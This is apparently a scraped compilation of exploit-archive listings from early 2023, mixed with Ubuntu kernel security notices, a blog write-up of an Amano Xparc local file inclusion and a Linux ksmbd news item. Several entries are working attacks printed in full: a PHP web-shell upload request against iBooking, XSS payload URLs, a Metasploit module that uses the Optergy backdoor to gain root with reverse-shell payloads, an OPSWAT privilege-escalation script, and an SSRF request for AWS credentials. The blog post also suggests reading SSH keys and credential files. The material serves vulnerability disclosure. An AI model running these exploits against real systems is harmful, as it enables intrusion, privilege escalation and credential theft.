iBooking version 1.0.8 suffers from a remote shell upload vulnerability.

    # Exploit Title: iBooking v1.0.8 - Arbitrary File Upload# Exploit Author: d1z1n370/oPty# Date: 01/11/2022# Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088# Tested on: Linux# Version: 1.0.8# Exploit Description:The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.# PoC request POST https://localhost/dashboard/upload-new-media HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost/dashboard/settingsX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062Content-Length: 449Connection: closeCookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c-----------------------------115904534120015298741783774062Content-Disposition: form-data; name="_token"kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW-----------------------------115904534120015298741783774062Content-Disposition: form-data; name="is_modal"1-----------------------------115904534120015298741783774062Content-Disposition: form-data; name="file"; filename="upload.php56"Content-Type: image/gifGIF89a;<?php system($_GET['a']); phpinfo(); ?>-----------------------------115904534120015298741783774062--

iBooking 1.0.8 Remote Shell Upload

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

**ReQlogic 11.3 Cross Site Scripting**

Posted Mar 28, 2023

Authored by Okan Kurtulus

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

advisories | CVE-2022-41441

SHA-256 | 5227ba88f59a5d4cccd1b7cd664927cd29c2794c9b0bb18836fe0f6ab3662551

Download | Favorite | View

**ReQlogic 11.3 Cross Site Scripting**

    # Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)# Date: 9 October 2022# Exploit Author: Okan Kurtulus# Vendor Homepage: https://reqlogic.com# Version: 11.3# Tested on: Linux# CVE : 2022-41441# Proof of Concept:1- Install ReQlogic v11.32- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=33- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.#XSS Payload:</script><script>alert(1)</script>#Affected PrametersPOBatchWaitDuration#Final URLshttp://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>

**File Tags**

*   ActiveX (932)
*   Advisory (80,599)
*   Arbitrary (15,917)
*   BBS (2,859)
*   Bypass (1,653)
*   CGI (1,022)
*   Code Execution (7,047)
*   Conference (677)
*   Cracker (840)
*   CSRF (3,306)
*   DoS (22,932)
*   Encryption (2,359)
*   Exploit (50,720)
*   File Inclusion (4,180)
*   File Upload (951)
*   Firewall (821)
*   Info Disclosure (2,689)
*   Intrusion Detection (876)
*   Java (2,957)
*   JavaScript (830)
*   Kernel (6,449)
*   Local (14,297)
*   Magazine (586)
*   Overflow (12,543)
*   Perl (1,419)
*   PHP (5,111)
*   Proof of Concept (2,297)
*   Protocol (3,502)
*   Python (1,488)
*   Remote (30,282)
*   Root (3,534)
*   Rootkit (502)
*   Ruby (603)
*   Scanner (1,633)
*   Security Tool (7,824)
*   Shell (3,133)
*   Shellcode (1,206)
*   Sniffer (890)
*   Spoof (2,182)
*   SQL Injection (16,171)
*   TCP (2,384)
*   Trojan (687)
*   UDP (880)
*   Virus (663)
*   Vulnerability (31,381)
*   Web (9,467)
*   Whitepaper (3,740)
*   x86 (946)
*   XSS (17,581)
*   Other

**File Archives**

*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,960)
*   BSD (370)
*   CentOS (56)
*   Cisco (1,919)
*   Debian (6,714)
*   Fedora (1,691)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (340)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,130)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (12,923)
*   Slackware (941)
*   Solaris (1,609)
*   SUSE (1,444)
*   Ubuntu (8,448)
*   UNIX (9,208)
*   UnixWare (185)
*   Windows (6,532)
*   Other

ReQlogic 11.3 Cross Site Scripting

This Metasploit module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise Building Management System (BMS) applications. Versions 2.0.3a and below are vulnerable. Attackers can exploit this issue by directly navigating to an undocumented backdoor script called Console.jsp in the tools directory and gain full system access. Successful exploitation results in root command execution using sudo as user optergy.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Optergy Proton and Enterprise BMS Command Injection using a backdoor',        'Description' => %q{          This module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise          Building Management System (BMS) applications. Versions `2.0.3a` and below are vulnerable.          Attackers can exploit this issue by directly navigating to an undocumented backdoor script          called Console.jsp in the tools directory and gain full system access.          Successful exploitation results in `root` command execution using `sudo` as user `optergy`.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF Module contributor          'Gjoko Krstic <gjoko[at]applied-risk.com>' # Discovery        ],        'References' => [          [ 'CVE', '2019-7276'],          [ 'URL', 'https://applied-risk.com/resources/ar-2019-008' ],          [ 'URL', 'https://optergy.com/products/proton/' ],          [ 'URL', 'https://optergy.com/products/optergy-enterprise/' ],          [ 'URL', 'https://attackerkb.com/topics/QrYFIjnd3J/cve-2019-7276' ],          [ 'EDB', '47641'],          [ 'PACKETSTORM', '155258']        ],        'DisclosureDate' => '2019-11-05',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'Payload' => { 'BadChars' => "\x20" },              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 80,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptBool.new('SUDO', [ true, 'Set the sudo option to get root privileges', false ])      ]    )  end  def execute_command(cmd, _opts = {})    # Step 1: get the challenge and compute the response answer for the backdoor execution    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/tools/ajax/ConsoleResult.html?get')    })    if res.nil? || (res.code != 200)      return nil    else      # Get and create a challenge response      res_json = res.get_json_document      return nil if res_json.nil? || res_json.blank?      # Get the challenge      challenge = res_json['response']['message']      # Make SHA1 hash from received challenge      h1 = Digest::SHA1.hexdigest challenge      # Make MD5 hash from SHA1 hash      h2 = Digest::MD5.hexdigest h1      # Combine MD5 hash and SHA1 hash as answer (response) to the challenge      answer = h1 + h2    end    # Step 2: execute payload (RCE) using the backdoor and challenge response obtained from step 1.    if target['Type'] == :linux_dropper      cmd = cmd.gsub(' ') { '${IFS}' }    end    if datastore['SUDO']      payload = "sudo bash -c #{cmd}"    else      payload = "bash -c #{cmd}"    end    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/tools/ajax/ConsoleResult.html'),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        'command' => payload,        'challenge' => challenge,        'answer' => answer      }    })    if res.nil? || (res.code != 200)      return nil    else      # get result and return the command response      res_json = res.get_json_document      return nil if res_json.nil? || res_json.blank?      res_cmd_output = res_json['response']['message']      return res_cmd_output    end  end  # Checking if the target is vulnerable by executing the whoami command via the backdoor  def check    res = execute_command('whoami')    return Exploit::CheckCode::Safe unless res && (res.chomp == 'root' || res.chomp == 'optergy')    Exploit::CheckCode::Vulnerable  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      res = execute_command(payload.encoded)      fail_with(Failure::PayloadFailed, "#{datastore['PAYLOAD']} failed.") if res.nil?    when :linux_dropper      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager    end  endend

Optergy Proton And Enterprise BMS 2.0.3a Command Injection

Ubuntu Security Notice 5977-1 - It was discovered that the network queuing discipline implementation in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the KVM VMX implementation in the Linux kernel did not properly handle indirect branch prediction isolation between L1 and L2 VMs. An attacker in a guest VM could use this to expose sensitive information from the host OS or other guest VMs.

    ==========================================================================Ubuntu Security Notice USN-5977-1March 27, 2023linux-oem-6.0 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-oem-6.0: Linux kernel for OEM systemsDetails:It was discovered that the network queuing discipline implementation in theLinux kernel contained a use-after-free vulnerability. A local attackercould use this to cause a denial of service (system crash) or possiblyexecute arbitrary code. (CVE-2023-1281)It was discovered that the KVM VMX implementation in the Linux kernel didnot properly handle indirect branch prediction isolation between L1 and L2VMs. An attacker in a guest VM could use this to expose sensitiveinformation from the host OS or other guest VMs. (CVE-2022-2196)Thadeu Cascardo discovered that the io_uring subsystem contained a double-free vulnerability in certain memory allocation error conditions. A localattacker could possibly use this to cause a denial of service (systemcrash). (CVE-2023-1032)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-6.0.0-1013-oem      6.0.0-1013.13   linux-image-oem-22.04b          6.0.0.1013.13After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5977-1   CVE-2022-2196, CVE-2023-1032, CVE-2023-1281Package Information:   https://launchpad.net/ubuntu/+source/linux-oem-6.0/6.0.0-1013.13

Ubuntu Security Notice USN-5977-1

OPSWAT Metadefender Core version 4.21.1 suffers from a privilege escalation vulnerability.

    # Exploit Title: OPSWAT Metadefender Core - Privilege Escalation# Date: 24 October 2022# Exploit Author: Ulascan Yildirim# Vendor Homepage: https://www.opswat.com/# Version: Metadefender Core 4.21.1# Tested on: Windows / Linux# CVE : CVE-2022-32272# =============================================================================# This is a PoC for the Metadefender Core Privilege escalation vulnerability.# To use this PoC, you need a Username & Password.# The OMS_CSRF_TOKEN allows users to execute commands with higher privileges.# =============================================================================#!/usr/bin/env python3import requestsimport jsonfrom getpass import getpassurl = input("Enter URL in this Format (http://website.com): ")username = input("Username: ")password = getpass("Password: ")url_login = url+'/login'url_user = url+'/user'logindata = {"user":username,"password":password}## Get the OMS_CSRF_TOKEN & session cookieresponse_login = requests.post(url_login, json = logindata).json()json_str = json.dumps(response_login)resp = json.loads(json_str)token = resp['oms_csrf_token']session = resp['session_id']## Prepare Header & Cookieheaders = {    "oms_csrf_token": token,}cookie = {    "session_id_ometascan": session}## Set Payload to get Admin rolepayload = '{"roles": ["1"]}'response = requests.put(url_user,headers=headers,cookies=cookie,data=payload)print("Response status code: "+str(response.status_code))if response.status_code == 200:    print("Expolit Successful!")else:    print("Exploit Unsuccessful")

OPSWAT Metadefender Core 4.21.1 Privilege Escalation

Ubuntu Security Notice 5976-1 - It was discovered that the Upper Level Protocol subsystem in the Linux kernel did not properly handle sockets entering the LISTEN state in certain protocols, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the KVM VMX implementation in the Linux kernel did not properly handle indirect branch prediction isolation between L1 and L2 VMs. An attacker in a guest VM could use this to expose sensitive information from the host OS or other guest VMs.

==========================================================================  
Ubuntu Security Notice USN-5976-1  
March 27, 2023

linux-oem-5.14, linux-oem-5.17 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-oem-5.17: Linux kernel for OEM systems  
- linux-oem-5.14: Linux kernel for OEM systems

Details:

It was discovered that the Upper Level Protocol (ULP) subsystem in the  
Linux kernel did not properly handle sockets entering the LISTEN state in  
certain protocols, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-0461)

It was discovered that the KVM VMX implementation in the Linux kernel did  
not properly handle indirect branch prediction isolation between L1 and L2  
VMs. An attacker in a guest VM could use this to expose sensitive  
information from the host OS or other guest VMs. (CVE-2022-2196)

It was discovered that the Intel 740 frame buffer driver in the Linux  
kernel contained a divide by zero vulnerability. A local attacker could use  
this to cause a denial of service (system crash). (CVE-2022-3061)

It was discovered that the Broadcom FullMAC USB WiFi driver in the Linux  
kernel did not properly perform bounds checking in some situations. A  
physically proximate attacker could use this to craft a malicious USB  
device that when inserted, could cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-3628)

Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux  
kernel contained an out-of-bounds write vulnerability. A local attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-36280)

It was discovered that the NILFS2 file system implementation in the Linux  
kernel did not properly deallocate memory in certain error conditions. An  
attacker could use this to cause a denial of service (memory exhaustion).  
(CVE-2022-3646)

Khalid Masum discovered that the NILFS2 file system implementation in the  
Linux kernel did not properly handle certain error conditions, leading to a  
use-after-free vulnerability. A local attacker could use this to cause a  
denial of service or possibly execute arbitrary code. (CVE-2022-3649)

It was discovered that a race condition existed in the Roccat HID driver in  
the Linux kernel, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-41850)

Kyle Zeng discovered that the IPv6 implementation in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-0394)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.17.0-1029-oem     5.17.0-1029.30  
   linux-image-oem-22.04           5.17.0.1029.27  
   linux-image-oem-22.04a          5.17.0.1029.27

Ubuntu 20.04 LTS:  
   linux-image-5.14.0-1059-oem     5.14.0-1059.67  
   linux-image-oem-20.04           5.14.0.1059.57  
   linux-image-oem-20.04b          5.14.0.1059.57  
   linux-image-oem-20.04c          5.14.0.1059.57  
   linux-image-oem-20.04d          5.14.0.1059.57

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5976-1  
   CVE-2022-2196, CVE-2022-3061, CVE-2022-3628, CVE-2022-36280,  
   CVE-2022-3646, CVE-2022-3649, CVE-2022-41850, CVE-2023-0394,  
   CVE-2023-0461

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-oem-5.17/5.17.0-1029.30  
   https://launchpad.net/ubuntu/+source/linux-oem-5.14/5.14.0-1059.67

Ubuntu Security Notice USN-5976-1

X-Skipper-Proxy version 0.13.237 suffers from a server-side request forgery vulnerability.

    #Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)#Date: 24/10/2022#Exploit Author: Hosein Vita & Milad Fadavvi#Vendor Homepage: https://github.com/zalando/skipper#Software Link: https://github.com/zalando/skipper#Version: < v0.13.237#Tested on: Linux#CVE: CVE-2022-38580Summary:Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request.Proof Of Concept:1- Add header "X-Skipper-Proxy"  to your request2- Add the aws metadata to the pathGET /latest/meta-data/iam/security-credentials HTTP/1.1Host: yourskipperdomain.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36X-Skipper-Proxy: http://169.254.169.254Connection: closeReference:https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2

X-Skipper-Proxy 0.13.237 Server-Side Request Forgery

amano Xparc parking solutions 7.1.3879 was discovered to be vulnerable to local file inclusion.

**Introduction**

Hello everyone, during one of the penetration testing assessments, we faced Amano Xparc parking solution web application. While conducting the assessment we discovered multiple vulnerabilities and we submitted it to https://cve.mitre.org/. For your reference the links for the other CVEs blogs:

*   **SQL injection CVE-2023–23331:** https://0xhunter20.medium.com/how-i-found-my-first-blind-sql-injection-cve-2023-23331-aef103a7f73c

Today I will be demonstrating CVE-2023–23330.

**Vulnerability Details**

*   **Vulnerable Software**: Amano Xoffice parking solutions
*   **Vulnerability:** Local File Inclusion
*   **Affected Version:** 7.1 (7.1.3879)
*   **Vendor Homepage:**https://www.amano.eu/en/
*   **CVE:** CVE**\-**2023–23330

**What is Local File Inclusion (LFI)?**

_“Local file inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application”_

_\- OWASP_

To simplify things, LFI is a vulnerability that abuses a flaw when a server tries to include a file. The idea is to let the include unattended files such as system files or non-published documents.

**Why LFI is there? and how to prevent it.**

It occurs due to the use of user input without validation.

Preventing LFI could be done by considering the following:

*   Avoid passing user-submitted input to the system.
*   Whitelist files that can be included.
*   Reject un-defined/Whitelisted document.
*   Do not permit file paths to be appended directly make them hard-coded.
*   Use databases instead of filesystems. Either to store the files in the database or store the file path in the database.

**CVE Demo**

While exploring the website manually, I noticed a page to download the user manual and guide. I intercepted the request in burp so I can use Burp repeater for easier request manipulation. The image below shows the parameter and user manual file:

So, clearly, the “file” parameter in the GET request is responsible for specifying the file name. interesting…

Let’s try to change the file name to “/etc/passwd” which is a default file in Linux/Unix servers and readable by all users. The image below shows the try to inject “/etc/passwd”:

So, it didn’t work directly, as the error shows in the HTTP response the file “../manuals/etc/passwd” was not found.

**No Problem!**

Instead of using the absolute path of “/etc/passwd” we will use the relative path. In file systems to get a file there are two main ways “absolute” or “relative”.

Now let’s fuzz the relative path to know what is the depth of the file. We can use Burp intruder, python scripts, or manually in Burp repeater. The image below shows the first try with a depth of 2 manually in the Burp repeater:

Didn’t work, let’s try depth 3

**It worked!**

We were able to include a file from the system without any validation.

The question now is, how to abuse that?

There are multiple ways to exploit this and gain more. Each case or scenario has its own way to go further. However, I may suggest looking into:

*   **Config files & Source code**: most of the time DB credentials, API tokens …etc. Are stored in clear-text format either in Config files or source code.
*   **Well-Known files**: You may try to access well-known files such as Shadow file, log files, bash history, SSH keys …etc.

For the sake of knowledge, let’s try an example of a source code and SSH key.

SSH key file

Version.php file

****Acknowledgment:****

I would like to thank the teammates: Fahad Almulhim (0xHunter) and Osama Aldosari. Also, many thanks to the Saudi information and technology company — SITE for their continuous support.

**References:**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23330
*   https://0xhunter20.medium.com/how-i-found-my-first-blind-sql-injection-cve-2023-23331-aef103a7f73c
*   https://owasp.org/www-project-web-security-testing-guide/v42/4-Web\_Application\_Security\_Testing/07-Input\_Validation\_Testing/11.1-Testing\_for\_Local\_File\_Inclusion

CVE-2023-23330: Amano Xparc Local File Inclusion (CVE-2023–23330) - Saleh - Medium

A bug affects the Linux kernel’s ksmbd NTLMv2 authentication and is known to crash the OS immediately in Linux-based systems.

A security researcher has discovered that the Linux kernel is affected by a potentially serious vulnerability that can be exploited by a remote, unauthenticated attacker to launch denial-of-service (DoS) attacks.

Tracked as CVE-2023-0210, the bug affects the Linux kernel’s ksmbd NTLMv2 authentication and is known to crash the OS immediately in Linux-based systems. KSMBD is an open-source In-kernel CIFS/SMB3 server created by Namjae Jeon for Linux Kernel. It’s an implementation of SMB/CIFS protocol in kernel space for sharing files and IPC services over the network.

Exploiting the flaw requires sending malformed packets, respectively, to a targeted server, personal computer, tablet, or smartphone. The attack triggers _“a heap overflow bug in ksmbd\_decode\_ntlmssp\_auth\_blob in which nt\_len can be less than CIFS\_ENCPWD\_SIZE. This results in a negative blen argument for ksmbd\_auth\_ntlmv2, where it calls memcpy using blen on memory allocated by kmalloc(blen + CIFS\_CRYPTO\_KEY\_SIZE). Note that CIFS\_ENCPWD\_SIZE is 16 and CIFS\_CRYPTO\_KEY\_SIZE is 8. We believe this bug can only result in a remote DOS and not privilege escalation nor RCE, as the heap overflow occurs when blen is in range (-8, -1\].”_

The vulnerability exists due to the way versions 5.15-rc1 and later of the Linux kernel handle NTLMv2 authentication. Linux kernel developers haven’t released a patch. CVE-2023-0210 was proven to allow for remote panic in the OS immediately on the Ubuntu 20.04 HWE and 22.04 (both running on 5.15.0-56-generic).

Proof of concept code is currently available online, which somewhat increases the immediate danger to device owners. It’s recommended that users update Linux servers immediately and apply the patches for other distros as soon as they are available.

CVE-2023-0210: CVE-2023-0210: Flaw in Linux Kernel Allows Unauthenticated remote DOS Attacks

A buffer overflow vulnerability was found in the Netfilter subsystem in the Linux Kernel. This issue could allow the leakage of both stack and heap addresses, and potentially allow Local Privilege Escalation to the root user via arbitrary code execution.

'2161713?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

Tag

#linux